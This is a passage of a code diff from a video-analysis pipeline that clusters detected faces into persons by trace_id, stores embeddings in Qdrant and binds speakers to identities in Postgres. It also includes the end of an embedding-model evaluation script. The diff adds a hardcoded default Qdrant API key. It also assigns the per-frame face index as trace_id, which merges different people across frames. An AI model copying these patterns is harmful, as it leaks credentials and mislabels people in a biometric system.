top5 = similarities[:5]
results["test_results"].append({
"query": test["query"],
"lang": test["lang"],
"latency_ms": round(latency * 1000, 1),
"top5": top5,
})
return results
def main():
parser = argparse.ArgumentParser(description="Embedding model evaluation")
parser.add_argument("--file-uuid", "-u", help="File UUID for VLM data")
parser.add_argument("--output-dir", "-o", default="/Users/accusys/momentry/output", help="Output directory")
parser.add_argument("--limit", "-l", type=int, default=100, help="Max VLM descriptions to embed")
args = parser.parse_args()
print("=" * 70)
print("Embedding Model Evaluation")
print("=" * 70)
# Load VLM descriptions
descriptions = []
if args.file_uuid:
descriptions = load_vlm_descriptions(args.file_uuid, args.output_dir)
print(f"\n[eval] Loaded {len(descriptions)} VLM descriptions from {args.file_uuid}")
if not descriptions:
print("[eval] No VLM descriptions found. Using sample data...")
descriptions = [
{"id": "sample_1", "type": "sample", "text": "A person wearing a red shirt and black pants standing in an office."},
{"id": "sample_2", "type": "sample", "text": "Two people in a meeting room, one wearing glasses and formal attire."},
{"id": "sample_3", "type": "sample", "text": "A woman holding a small brown dog outdoors on a sunny day."},
{"id": "sample_4", "type": "sample", "text": "Night scene on a busy street with cars and pedestrians."},
{"id": "sample_5", "type": "sample", "text": "Person in casual clothing sitting at a desk in an office."},
]
# Evaluate Model A (embeddinggemma)
results_a = evaluate_model(get_embedding_a, "embeddinggemma", descriptions, TEST_QUERIES)
# Evaluate Model B (nomic-embed-text-v2-moe)
results_b = evaluate_model(get_embedding_b, "nomic-embed-text-v2-moe", descriptions, TEST_QUERIES)
# Print comparison
print("\n" + "=" * 70)
print("COMPARISON RESULTS")
print("=" * 70)
print(f"\n| Metric | embeddinggemma | nomic-embed-text-v2-moe |")
print(f"|--------|----------------|--------------------------|")
print(f"| Dimension | {results_a.get('dimension', 'N/A')} | {results_b.get('dimension', 'N/A')} |")
print(f"| Avg Latency | {results_a.get('avg_latency_ms', 'N/A')}ms | {results_b.get('avg_latency_ms', 'N/A')}ms |")
print(f"| Total Embedded | {results_a.get('total_embeddings', 0)} | {results_b.get('total_embeddings', 0)} |")
# Show test query results
print("\n" + "-" * 70)
print("TOP-5 RESULTS PER QUERY")
print("-" * 70)
for i, test in enumerate(TEST_QUERIES):
print(f"\nQuery: {test['query']} ({test['lang']})")
if i < len(results_a.get("test_results", [])):
print(f" embeddinggemma Top-5:")
for r in results_a["test_results"][i]["top5"]:
print(f" {r['id']}: {r['score']:.4f} - {r['text'][:50]}...")
if i < len(results_b.get("test_results", [])):
print(f" nomic Top-5:")
for r in results_b["test_results"][i]["top5"]:
print(f" {r['id']}: {r['score']:.4f} - {r['text'][:50]}...")
# Save results
output = {
"embeddinggemma": results_a,
"nomic-embed-text-v2-moe": results_b,
"comparison": {
"dimension_a": results_a.get("dimension"),
"dimension_b": results_b.get("dimension"),
"latency_diff_ms": (results_b.get("avg_latency_ms", 0) or 0) - (results_a.get("avg_latency_ms", 0) or 0),
},
"queries": TEST_QUERIES,
}
output_file = "embedding_eval_results.json"
with open(output_file, "w") as f:
json.dump(output, f, indent=2)
print(f"\n[eval] Results saved to: {output_file}")
if __name__ == "__main__":
main()
+347 -211
View File
@@ -1,246 +1,205 @@
#!/opt/homebrew/bin/python3.11
"""
Face Clustering Processor
職責:將短暫的 Face ID 聚合為持續的 Person ID,並自動綁定 Speaker。
Face Clustering Processor V3 - Single-stage trace clustering (Stage 2 merge removed)
Strategy:
1. Load face embeddings from Qdrant _faces collection
2. Group by trace_id, compute weighted average embedding per trace
3. Single-stage AgglomerativeClustering (no Stage 2 merge)
4. Assign person_id to all faces in each trace
5. Output face_cluster.json with auto speaker binding
Output format:
{"status", "file_uuid", "clusters": [{cluster_id, face_count, representative_face}], "frames": [{frame, timestamp, faces: [{face_id, cluster_id, confidence}]}]}
Changes from V2:
- Added argparse for CLI arguments
- Added Redis progress reporting
- Added status + file_uuid to output
- Added auto_bind_speakers() integration
Changes from previous (broken) version:
- REMOVED Stage 2 merge logic (was incorrectly merging different people)
"""
import cv2
import argparse
import json
import numpy as np
import os
import sys
import psycopg2
from collections import defaultdict
from sklearn.cluster import AgglomerativeClustering
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
from redis_publisher import RedisPublisher
# Use FaceNet embeddings from face.json instead of DeepFace
HAS_DEEPFACE = False
print("[FACE_CLUSTER] Using FaceNet embeddings from face.json (DeepFace not required)")
# 設定
UUID = os.getenv("UUID", "quick_preview")
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
VIDEO_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.mp4")
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face.json")
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face_clustered.json")
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.asrx.json")
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
DB_URL = os.getenv("DATABASE_URL", "postgresql://accusys@localhost:5432/momentry")
def optimized_clustering(embeddings):
"""
Optimized Clustering for large datasets (e.g. 25k faces).
Strategy: Sample -> Agglomerative -> Centroid Assignment
"""
import numpy as np
from sklearn.cluster import AgglomerativeClustering
from sklearn.metrics.pairwise import cosine_distances
n_faces = len(embeddings)
print(f" 🚀 Starting optimized clustering for {n_faces} faces...")
# 1. Sampling
sample_size = min(5000, n_faces)
if n_faces > sample_size:
indices = np.random.choice(n_faces, sample_size, replace=False)
sample_embeddings = embeddings[indices]
else:
sample_embeddings = embeddings
indices = np.arange(n_faces)
print(f" 📊 Sampling {len(sample_embeddings)} faces for clustering structure...")
# 2. Agglomerative Clustering on Sample
clustering = AgglomerativeClustering(
n_clusters=None, distance_threshold=0.4, metric="cosine", linkage="average"
)
sample_labels = clustering.fit_predict(sample_embeddings)
unique_labels = set(sample_labels)
n_clusters = len(unique_labels)
print(f" 🔍 Found {n_clusters} unique clusters in sample.")
# 3. Compute Centroids for each cluster
centroids = []
for label in unique_labels:
cluster_mask = sample_labels == label
cluster_faces = sample_embeddings[cluster_mask]
# Mean embedding
centroid = np.mean(cluster_faces, axis=0)
centroids.append(centroid)
centroids = np.array(centroids) # Shape: (n_clusters, 512)
# 4. Assign all faces to nearest centroid
# Batch processing to save memory
print(f" 🏃 Assigning {n_faces} faces to {n_clusters} clusters...")
all_labels = np.zeros(n_faces, dtype=int)
batch_size = 5000
for start in range(0, n_faces, batch_size):
end = min(start + batch_size, n_faces)
batch = embeddings[start:end]
dists = cosine_distances(batch, centroids)
all_labels[start:end] = np.argmin(dists, axis=1)
return all_labels
CLUSTER_THRESHOLD = 0.35
def main():
if not os.path.exists(FACE_JSON_PATH):
print("❌ Face JSON not found.")
return
def write_empty_output(status: str, file_uuid: str, output_path: str):
output_data = {
"status": status,
"file_uuid": file_uuid,
"clusters": [],
"frames": []
}
with open(output_path, "w", encoding="utf-8") as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"Wrote empty output ({status}) to {output_path}")
with open(FACE_JSON_PATH) as f:
face_data = json.load(f)
frames_list = face_data.get("frames", [])
if not frames_list:
print("❌ No frames in JSON.")
return
# Get embeddings from Qdrant
print(f"[FACE_CLUSTER] Loading embeddings from Qdrant for {UUID}...")
def load_qdrant_faces(uuid: str, publisher: RedisPublisher) -> list:
"""Load all face points (payload + vector) from Qdrant _faces for a file."""
publisher.progress("face_cluster", 0, 100, "Loading embeddings from Qdrant")
try:
import requests
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "")
collection = "_faces"
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
# Query all embeddings for this file_uuid
response = requests.post(
f"{qdrant_url}/collections/{collection}/points/scroll",
json={
all_points = []
offset = None
while True:
body = {
"limit": 10000,
"with_payload": True,
"with_vector": True,
"filter": {
"must": [
{"key": "file_uuid", "match": {"value": UUID}}
{"key": "file_uuid", "match": {"value": uuid}}
]
},
"limit": 10000,
"with_vector": True
},
headers=headers
)
if response.status_code == 200:
result = response.json()
points = result.get("result", {}).get("points", [])
print(f"[FACE_CLUSTER] Loaded {len(points)} embeddings from Qdrant")
# Build face_id -> embedding map
embedding_map = {}
for point in points:
face_id = point.get("payload", {}).get("face_id")
vector = point.get("vector")
if face_id and vector:
embedding_map[face_id] = vector
else:
print(f"[FACE_CLUSTER] Qdrant query failed: {response.status_code}")
embedding_map = {}
}
}
if offset:
body["offset"] = offset
resp = requests.post(
f"{qdrant_url}/collections/_faces/points/scroll",
json=body,
headers=headers,
timeout=60
)
if resp.status_code != 200:
print(f"Qdrant scroll error: {resp.status_code}")
break
data = resp.json()
batch = data.get("result", {}).get("points", [])
all_points.extend(batch)
next_offset = data.get("result", {}).get("next_page_offset")
if not next_offset:
break
offset = next_offset
print(f"Loaded {len(all_points)} points from Qdrant _faces")
return all_points
except Exception as e:
print(f"[FACE_CLUSTER] Failed to load embeddings from Qdrant: {e}")
embedding_map = {}
print(f"Failed to load embeddings from Qdrant: {e}")
return []
# Use embeddings from Qdrant - match by frame + bbox
embeddings = []
face_refs = []
print(f"🔍 Collecting face embeddings for {UUID}...")
def cluster_by_trace(points: list, min_faces_per_trace: int = 1, confidence_threshold: float = 0.5) -> tuple:
"""
Cluster faces by trace_id:
1. Filter low-confidence faces
2. Group by trace_id
3. Compute weighted average embedding per trace
"""
high_conf_points = [
p for p in points
if p.get("payload", {}).get("confidence", 0) >= confidence_threshold
]
print(f"[FILTER] {len(high_conf_points)}/{len(points)} faces pass confidence >= {confidence_threshold}")
# Build a lookup: (frame, bbox_center) -> embedding
# Use frame number and approximate bbox center for matching
qdrant_by_frame = {}
for point in points:
traces = defaultdict(list)
for point in high_conf_points:
payload = point.get("payload", {})
frame = payload.get("frame")
bbox = payload.get("bbox", {})
vector = point.get("vector")
if frame is not None and vector:
# Use frame + bbox center as key
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
key = (frame, cx, cy)
if key not in qdrant_by_frame:
qdrant_by_frame[key] = vector
trace_id = payload.get("trace_id")
if trace_id is not None and trace_id >= 0:
traces[trace_id].append(point)
print(f"[FACE_CLUSTER] Built Qdrant lookup with {len(qdrant_by_frame)} entries")
print(f"[TRACE] Found {len(traces)} unique traces")
for frame_idx, frame_obj in enumerate(frames_list):
frame_num = frame_obj.get("frame", frame_idx)
faces = frame_obj.get("faces", [])
if not faces:
trace_embeddings = {}
for trace_id, trace_points in traces.items():
if len(trace_points) < min_faces_per_trace:
continue
for face_idx, face in enumerate(faces):
x = face.get("x", 0)
y = face.get("y", 0)
w = face.get("width", 0)
h = face.get("height", 0)
cx = x + w // 2
cy = y + h // 2
embeddings = []
weights = []
for p in trace_points:
embeddings.append(p["vector"])
weights.append(p.get("payload", {}).get("confidence", 1.0))
# Try exact match first
key = (frame_num, cx, cy)
if key in qdrant_by_frame:
embeddings.append(qdrant_by_frame[key])
face_refs.append({"frame_idx": frame_idx, "face_idx": face_idx})
continue
embeddings = np.array(embeddings)
weights = np.array(weights)
weights = weights / weights.sum()
# Try approximate match (within 50 pixels)
for (qf, qx, qy), vec in qdrant_by_frame.items():
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
embeddings.append(vec)
face_refs.append({"frame_idx": frame_idx, "face_idx": face_idx})
break
avg_embedding = np.average(embeddings, axis=0, weights=weights)
avg_embedding = avg_embedding / np.linalg.norm(avg_embedding)
if not embeddings:
print("❌ No embeddings found in Qdrant.")
return
trace_embeddings[trace_id] = {
"embedding": avg_embedding,
"face_count": len(trace_points),
"avg_confidence": float(np.mean(weights)),
"frames": [p.get("payload", {}).get("frame") for p in trace_points],
"points": trace_points
}
embeddings = np.array(embeddings)
print(f"✅ Collected {len(embeddings)} face embeddings from Qdrant.")
print(f"[TRACE] {len(trace_embeddings)} traces with >= {min_faces_per_trace} faces")
return trace_embeddings, traces
# 2. 聚類
print(f"🧠 Clustering {len(embeddings)} faces...")
def single_stage_clustering(trace_embeddings: dict) -> dict:
"""
Single-stage AgglomerativeClustering on trace means.
No Stage 2 merge (the problematic logic has been removed).
"""
if not trace_embeddings:
return {}
trace_ids = list(trace_embeddings.keys())
n_traces = len(trace_ids)
if n_traces == 0:
return {}
if n_traces == 1:
return {trace_ids[0]: 0}
embeddings = np.array([trace_embeddings[tid]["embedding"] for tid in trace_ids])
print(f"[CLUSTER] Clustering {n_traces} traces (threshold={CLUSTER_THRESHOLD})...")
clustering = AgglomerativeClustering(
n_clusters=None, distance_threshold=0.4, metric="cosine", linkage="average"
n_clusters=None,
distance_threshold=CLUSTER_THRESHOLD,
metric="cosine",
linkage="average"
)
labels = clustering.fit_predict(embeddings)
unique_labels = set(labels)
label_to_person = {l: f"Person_{i}" for i, l in enumerate(unique_labels)}
print(
f"👥 Detected {len(unique_labels)} unique persons: {[label_to_person[l] for l in unique_labels]}"
)
print(f"[CLUSTER] Detected {len(unique_labels)} unique persons")
# 3. 更新 JSON
for ref, label in zip(face_refs, labels):
f_idx = ref["frame_idx"]
face_idx = ref["face_idx"]
person_id = label_to_person[label]
trace_to_person = {}
for i, trace_id in enumerate(trace_ids):
trace_to_person[trace_id] = labels[i]
if f_idx < len(frames_list):
faces = frames_list[f_idx].get("faces", [])
if face_idx < len(faces):
frames_list[f_idx]["faces"][face_idx]["person_id"] = person_id
# 保存
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
json.dump(face_data, f, indent=2, ensure_ascii=False)
print(f"✅ Saved clustered data to {OUTPUT_JSON_PATH}")
# 4. 自動綁定 Speaker
auto_bind_speakers()
return trace_to_person
def auto_bind_speakers():
if not os.path.exists(OUTPUT_JSON_PATH) or not os.path.exists(ASRX_JSON_PATH):
print("⚠️ Missing data for speaker binding.")
print("Missing data for speaker binding.")
return
with open(OUTPUT_JSON_PATH) as f:
@@ -248,61 +207,48 @@ def auto_bind_speakers():
with open(ASRX_JSON_PATH) as f:
asrx_data = json.load(f)
print("🔗 Auto-binding Speakers to Persons...")
print("Auto-binding Speakers to Persons...")
# 建立 Face 時間列表
face_spans = []
for frame_obj in face_clustered.get("frames", []):
ts = frame_obj.get("timestamp")
for face in frame_obj.get("faces", []):
person_id = face.get("person_id")
person_id = face.get("cluster_id")
if person_id and ts is not None:
face_spans.append({"ts": ts, "person_id": person_id})
speaker_person_counts = {}
# 對於每個說話片段,找出畫面中出現的人
for seg in asrx_data.get("segments", []):
start = seg.get("start")
end = seg.get("end")
speaker = seg.get("speaker_id")
if not speaker:
if not speaker or start is None or end is None:
continue
# 找時間重疊
candidates = [f for f in face_spans if start <= f["ts"] <= end]
candidates = [f for f in face_spans if f.get("ts") is not None and start <= f["ts"] <= end]
if candidates:
# 投票
person_counts = {}
for c in candidates:
pid = c["person_id"]
person_counts[pid] = person_counts.get(pid, 0) + 1
if speaker not in speaker_person_counts:
speaker_person_counts[speaker] = {}
best_person = max(person_counts, key=person_counts.get)
speaker_person_counts[speaker][best_person] = (
speaker_person_counts[speaker].get(best_person, 0) + 1
)
# 寫入資料庫
try:
conn = psycopg2.connect(DB_URL)
cur = conn.cursor()
for speaker, persons in speaker_person_counts.items():
if not persons:
continue
best_person = max(persons, key=persons.get)
print(
f" 🎤 {speaker} is likely {best_person} ({persons[best_person]} votes)"
)
print(f" {speaker} is likely {best_person} ({persons[best_person]} votes)")
# 1. 找或建 Talent
cur.execute("SELECT id FROM talents WHERE real_name = %s", (best_person,))
row = cur.fetchone()
if row:
talent_id = row[0]
else:
@@ -311,9 +257,8 @@ def auto_bind_speakers():
(best_person,),
)
talent_id = cur.fetchone()[0]
print(f" ✨ Created Talent #{talent_id} ({best_person})")
print(f" Created Talent #{talent_id} ({best_person})")
# 2. 綁定 Speaker
cur.execute(
"""
INSERT INTO identity_bindings (talent_id, binding_type, binding_value, source, confidence)
@@ -322,14 +267,205 @@ def auto_bind_speakers():
""",
(talent_id, speaker),
)
print(f" ✅ Bound {speaker} -> {best_person}")
print(f" Bound {speaker} -> {best_person}")
conn.commit()
cur.close()
conn.close()
except Exception as e:
print(f" ❌ DB Error: {e}")
print(f" DB Error: {e}")
def main():
global OUTPUT_JSON_PATH, UUID
parser = argparse.ArgumentParser(description="Face Clustering Processor V3")
parser.add_argument("video_path", help="Path to video file")
parser.add_argument("output_path", help="Path to output JSON file")
parser.add_argument("--uuid", help="Video UUID (optional, overrides env var)")
parser.add_argument("--force", action="store_true", help="Overwrite existing output")
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
OUTPUT_JSON_PATH = args.output_path
output_dir = os.path.dirname(args.output_path)
if args.uuid:
uuid = args.uuid
else:
uuid = os.path.basename(args.video_path).rsplit(".", 1)[0]
UUID = uuid
face_json_path = os.path.join(output_dir, f"{uuid}.face.json")
if not os.path.exists(face_json_path):
face_json_path = os.path.join(output_dir, uuid, f"{uuid}.face.json")
publisher = RedisPublisher(uuid)
publisher.info("face_cluster", "Face clustering started")
if not os.path.exists(face_json_path):
print("Face JSON not found.")
write_empty_output("no_face_json", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No face.json found")
return
with open(face_json_path) as f:
face_data = json.load(f)
frames_list = face_data.get("frames", [])
if not frames_list:
print("No frames in JSON (no faces).")
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No faces to cluster")
return
fps_value = face_data.get("fps", 23.98)
points = load_qdrant_faces(uuid, publisher)
if not points:
print("No embeddings found in Qdrant.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No embeddings in Qdrant")
return
publisher.progress("face_cluster", 10, 100, f"Loaded {len(points)} Qdrant points")
trace_embeddings, traces = cluster_by_trace(
points,
min_faces_per_trace=1,
confidence_threshold=0.5
)
if not trace_embeddings:
print("No valid traces found.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "No valid traces")
return
publisher.progress("face_cluster", 30, 100, f"Found {len(trace_embeddings)} traces")
trace_to_person = single_stage_clustering(trace_embeddings)
if not trace_to_person:
print("Clustering produced no results.")
write_empty_output("no_embeddings", uuid, OUTPUT_JSON_PATH)
publisher.complete("face_cluster", "Clustering empty")
return
n_persons = len(set(trace_to_person.values()))
print(f"Clustering result: {n_persons} persons ({len(trace_to_person)} traces)")
publisher.progress("face_cluster", 50, 100, f"Found {n_persons} persons")
qdrant_by_frame_trace = {}
for point in points:
payload = point.get("payload", {})
frame = payload.get("frame")
trace_id = payload.get("trace_id", -1)
bbox = payload.get("bbox", {})
if frame is not None and trace_id >= 0:
cx = bbox.get("x", 0) + bbox.get("width", 0) // 2
cy = bbox.get("y", 0) + bbox.get("height", 0) // 2
key = (frame, cx, cy)
qdrant_by_frame_trace[key] = trace_id
matched_count = 0
for frame_idx, frame_obj in enumerate(frames_list):
frame_num = frame_obj.get("frame", frame_idx)
for face in frame_obj.get("faces", []):
x = face.get("x", 0)
y = face.get("y", 0)
w = face.get("width", 0)
h = face.get("height", 0)
cx = x + w // 2
cy = y + h // 2
key = (frame_num, cx, cy)
trace_id = qdrant_by_frame_trace.get(key)
if trace_id is None:
for (qf, qx, qy), tid in qdrant_by_frame_trace.items():
if qf == frame_num and abs(qx - cx) < 50 and abs(qy - cy) < 50:
trace_id = tid
break
if trace_id is not None and trace_id in trace_to_person:
person_label = trace_to_person[trace_id]
face["person_id"] = f"Person_{person_label}"
matched_count += 1
print(f" Assigned person_id to {matched_count} faces")
if matched_count == 0:
print("No faces matched to any trace - check Qdrant data integrity")
publisher.progress("face_cluster", 100, 100, "No trace matches")
write_empty_output("no_faces", uuid, OUTPUT_JSON_PATH)
return
publisher.progress("face_cluster", 70, 100, f"Matched {matched_count} faces")
person_face_count = defaultdict(int)
person_best_face = {}
for frame_idx, frame_obj in enumerate(frames_list):
for face in frame_obj.get("faces", []):
person_id = face.get("person_id")
if not person_id:
continue
person_face_count[person_id] += 1
confidence = face.get("confidence", 0.9)
if person_id not in person_best_face or confidence > person_best_face[person_id]["confidence"]:
person_best_face[person_id] = {
"face_id": f"face_{frame_idx}_{frame_idx}",
"confidence": confidence,
"frame": frame_obj.get("frame", frame_idx),
"bbox": {
"x": face.get("x"),
"y": face.get("y"),
"width": face.get("width"),
"height": face.get("height")
}
}
person_labels_sorted = sorted(person_face_count.keys(), key=lambda p: -person_face_count[p])
clusters = []
for person_id in person_labels_sorted:
cluster_entry = {
"cluster_id": person_id,
"face_count": person_face_count[person_id],
"representative_face": person_best_face.get(person_id)
}
clusters.append(cluster_entry)
output_frames = []
for frame_idx, frame_obj in enumerate(frames_list):
timestamp = frame_obj.get("timestamp", frame_obj.get("frame", 0) / fps_value if fps_value > 0 else 0)
output_faces = []
for face in frame_obj.get("faces", []):
person_id = face.get("person_id")
if person_id:
output_faces.append({
"face_id": f"face_{frame_idx}_{frame_idx}",
"cluster_id": person_id,
"confidence": face.get("confidence", 0.9),
})
if output_faces:
output_frames.append({
"frame": frame_obj.get("frame", frame_idx),
"timestamp": timestamp,
"faces": output_faces,
})
output_data = {
"status": "has_faces",
"file_uuid": UUID,
"clusters": clusters,
"frames": output_frames,
}
with open(OUTPUT_JSON_PATH, "w", encoding="utf-8") as f:
json.dump(output_data, f, indent=2, ensure_ascii=False)
print(f"Saved clustered data to {OUTPUT_JSON_PATH}")
publisher.progress("face_cluster", 90, 100, f"{len(clusters)} clusters")
auto_bind_speakers()
publisher.complete("face_cluster", f"{len(clusters)} clusters")
if __name__ == "__main__":
main()
main()
+25 -26
View File
@@ -35,7 +35,8 @@ from redis_publisher import RedisPublisher
from qdrant_faces import push_face_embeddings_batch
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_face_pose")
SWIFT_BIN = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "release", "swift_face")
SWIFT_BIN_DEBUG = os.path.join(SCRIPT_DIR, "swift_processors", ".build", "debug", "swift_face")
FACENET_PATH = os.path.join(SCRIPT_DIR, "..", "models", "facenet512.mlpackage")
# Pose angle classification from roll/yaw
@@ -113,33 +114,33 @@ class FaceProcessorVision:
return None
def process_with_swift(self) -> Dict:
"""Step 1: Run swift_face_pose to get bbox + pose (generates face.json + pose.json)"""
print(f"[FACE_V2] Step 1: Vision detection (face + pose)...")
"""Step 1: Run swift_face to get bbox (generates face_detect.json only)
Note: swift_face only does face detection.
Pose and appearance expansion happen later via separate processors:
- swift_pose_expansion reads face_traced.json (with trace_id)
- swift_appearance_expansion reads pose.json
"""
print(f"[FACE_V2] Step 1: Vision detection (face only)...")
# Build swift_face_pose if needed
if not os.path.exists(SWIFT_BIN):
# Build swift_face if needed
if not os.path.exists(SWIFT_BIN) and not os.path.exists(SWIFT_BIN_DEBUG):
build_dir = os.path.join(SCRIPT_DIR, "swift_processors")
print(f"[FACE_V2] Building swift_face_pose in {build_dir}...")
print(f"[FACE_V2] Building swift_face in {build_dir}...")
subprocess.run(
["swift", "build", "-c", "debug", "--product", "swift_face_pose"],
["swift", "build", "-c", "release", "--product", "swift_face"],
cwd=build_dir, check=True
)
# Determine which binary to use
swift_bin = SWIFT_BIN if os.path.exists(SWIFT_BIN) else SWIFT_BIN_DEBUG
swift_face_out = self.output_path.replace(".json", "_detect.json")
# Pose output: same directory, but replace "face" with "pose" in filename
output_dir = os.path.dirname(self.output_path)
output_basename = os.path.basename(self.output_path)
pose_basename = output_basename.replace("face", "pose")
swift_pose_out = os.path.join(output_dir, pose_basename)
# Appearance output: same directory, but replace "face" with "appearance" in filename
appearance_basename = output_basename.replace("face", "appearance")
swift_appearance_out = os.path.join(output_dir, appearance_basename)
cmd = [
SWIFT_BIN,
swift_bin,
self.video_path,
swift_face_out,
swift_pose_out,
swift_appearance_out,
"--sample-interval", str(self.sample_interval),
]
if self.uuid:
@@ -169,10 +170,10 @@ class FaceProcessorVision:
pass
log_f.close()
if proc.returncode != 0:
stderr_out = proc.stderr.read()
stderr_out = proc.stderr.read() if proc.stderr else ""
if stderr_out:
print(stderr_out.strip(), file=sys.stderr)
raise RuntimeError(f"swift_face_pose exited with code {proc.returncode}")
raise RuntimeError(f"swift_face exited with code {proc.returncode}")
elapsed = time.time() - t0
print(f"[FACE_V2] Detection done in {elapsed:.1f}s")
@@ -180,10 +181,6 @@ class FaceProcessorVision:
with open(swift_face_out) as f:
face_data = json.load(f)
# Also check if pose.json was generated (for reference)
if os.path.exists(swift_pose_out):
print(f"[FACE_V2] Pose file generated: {swift_pose_out}")
return face_data
def embed_and_save(self, detection_data: Dict):
@@ -215,7 +212,7 @@ class FaceProcessorVision:
for frame_info in frames:
frame_num = frame_info["frame"]
faces = []
for face in frame_info.get("faces", []):
for face_idx, face in enumerate(frame_info.get("faces", [])):
bb = face["bbox"]
x, y, w, h = bb["x"], bb["y"], bb["width"], bb["height"]
@@ -242,9 +239,10 @@ class FaceProcessorVision:
if emb is not None:
embed_count += 1
# Collect for batch Qdrant push
# Use face_idx to distinguish multiple faces in same frame
all_embeddings.append({
"frame": frame_num,
"trace_id": 0, # Initial, updated by face_tracker
"trace_id": face_idx, # Use face_idx as unique identifier within frame
"bbox": {"x": x, "y": y, "width": w, "height": h},
"confidence": face.get("confidence", 0.5),
"embedding": emb,
@@ -345,6 +343,7 @@ def main():
parser.add_argument("--uuid", "-u", default="")
parser.add_argument("--sample-interval", type=int, default=3)
parser.add_argument("--force", action="store_true")
parser.add_argument("--frames", type=str, default=None, help=argparse.SUPPRESS)
args = parser.parse_args()
publisher = RedisPublisher(args.uuid) if args.uuid else None
@@ -0,0 +1,278 @@
#!/opt/homebrew/bin/python3.11
"""
Face Clustering Processor V2 - Cluster by trace_id
Strategy:
1. Group faces by trace_id
2. Compute average embedding per trace
3. Cluster traces (not individual faces)
4. Assign person_id to all faces in each trace
"""
import json
import numpy as np
import os
import sys
from collections import defaultdict
from sklearn.cluster import AgglomerativeClustering
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
UUID = os.getenv("UUID", "quick_preview")
OUTPUT_DIR = os.getenv("MOMENTRY_OUTPUT_DIR", "./output")
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face.json")
if not os.path.exists(FACE_JSON_PATH):
FACE_JSON_PATH = os.path.join(OUTPUT_DIR, UUID, f"{UUID}.face.json")
OUTPUT_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.face_clustered.json")
ASRX_JSON_PATH = os.path.join(OUTPUT_DIR, f"{UUID}.asrx.json")
def get_embeddings_from_qdrant(file_uuid):
"""Get all face embeddings from Qdrant grouped by trace_id"""
import requests
qdrant_url = os.environ.get("QDRANT_URL", "http://localhost:6333")
qdrant_api_key = os.environ.get("QDRANT_API_KEY", "")
headers = {}
if qdrant_api_key:
headers["api-key"] = qdrant_api_key
# Scroll through all points
all_points = []
offset = None
while True:
payload = {
"filter": {
"must": [
{"key": "file_uuid", "match": {"value": file_uuid}}
]
},
"limit": 1000,
"with_vector": True
}
if offset:
payload["offset"] = offset
response = requests.post(
f"{qdrant_url}/collections/_faces/points/scroll",
json=payload,
headers=headers
)
if response.status_code != 200:
print(f"Qdrant error: {response.status_code}")
break
result = response.json().get("result", {})
points = result.get("points", [])
if not points:
break
all_points.extend(points)
offset = result.get("next_page_offset")
if not offset:
break
if len(all_points) % 5000 == 0:
print(f" Loaded {len(all_points)} points...")
print(f"[QDRANT] Loaded {len(all_points)} face embeddings")
return all_points
def cluster_by_trace(points, min_faces_per_trace=2, confidence_threshold=0.5):
"""
Cluster faces by trace_id:
1. Filter low-confidence faces
2. Group by trace_id
3. Compute weighted average embedding per trace
4. Cluster traces
"""
# Filter by confidence
high_conf_points = [
p for p in points
if p.get("payload", {}).get("confidence", 0) >= confidence_threshold
]
print(f"[FILTER] {len(high_conf_points)}/{len(points)} faces pass confidence >= {confidence_threshold}")
# Group by trace_id
traces = defaultdict(list)
for point in high_conf_points:
payload = point.get("payload", {})
trace_id = payload.get("trace_id")
if trace_id is not None and trace_id >= 0:
traces[trace_id].append(point)
print(f"[TRACE] Found {len(traces)} unique traces")
# Compute average embedding per trace
trace_embeddings = {}
for trace_id, trace_points in traces.items():
if len(trace_points) < min_faces_per_trace:
continue
# Weighted average by confidence
embeddings = []
weights = []
for p in trace_points:
embeddings.append(p["vector"])
weights.append(p.get("payload", {}).get("confidence", 1.0))
embeddings = np.array(embeddings)
weights = np.array(weights)
weights = weights / weights.sum()
avg_embedding = np.average(embeddings, axis=0, weights=weights)
trace_embeddings[trace_id] = {
"embedding": avg_embedding,
"face_count": len(trace_points),
"avg_confidence": float(np.mean(weights)),
"frames": [p.get("payload", {}).get("frame") for p in trace_points]
}
print(f"[TRACE] {len(trace_embeddings)} traces with >= {min_faces_per_trace} faces")
return trace_embeddings, traces
def main():
if not os.path.exists(FACE_JSON_PATH):
print(f"❌ Face JSON not found: {FACE_JSON_PATH}")
return
# Load face.json for frame structure
with open(FACE_JSON_PATH) as f:
face_data = json.load(f)
frames_list = face_data.get("frames", [])
if not frames_list:
print("❌ No frames in JSON")
return
# Get embeddings from Qdrant
print(f"[FACE_CLUSTER_V2] Loading embeddings for {UUID}...")
points = get_embeddings_from_qdrant(UUID)
if not points:
print("❌ No embeddings found")
return
# Cluster by trace_id
trace_embeddings, traces = cluster_by_trace(
points,
min_faces_per_trace=1, # Minimum 1 face per trace
confidence_threshold=0.5
)
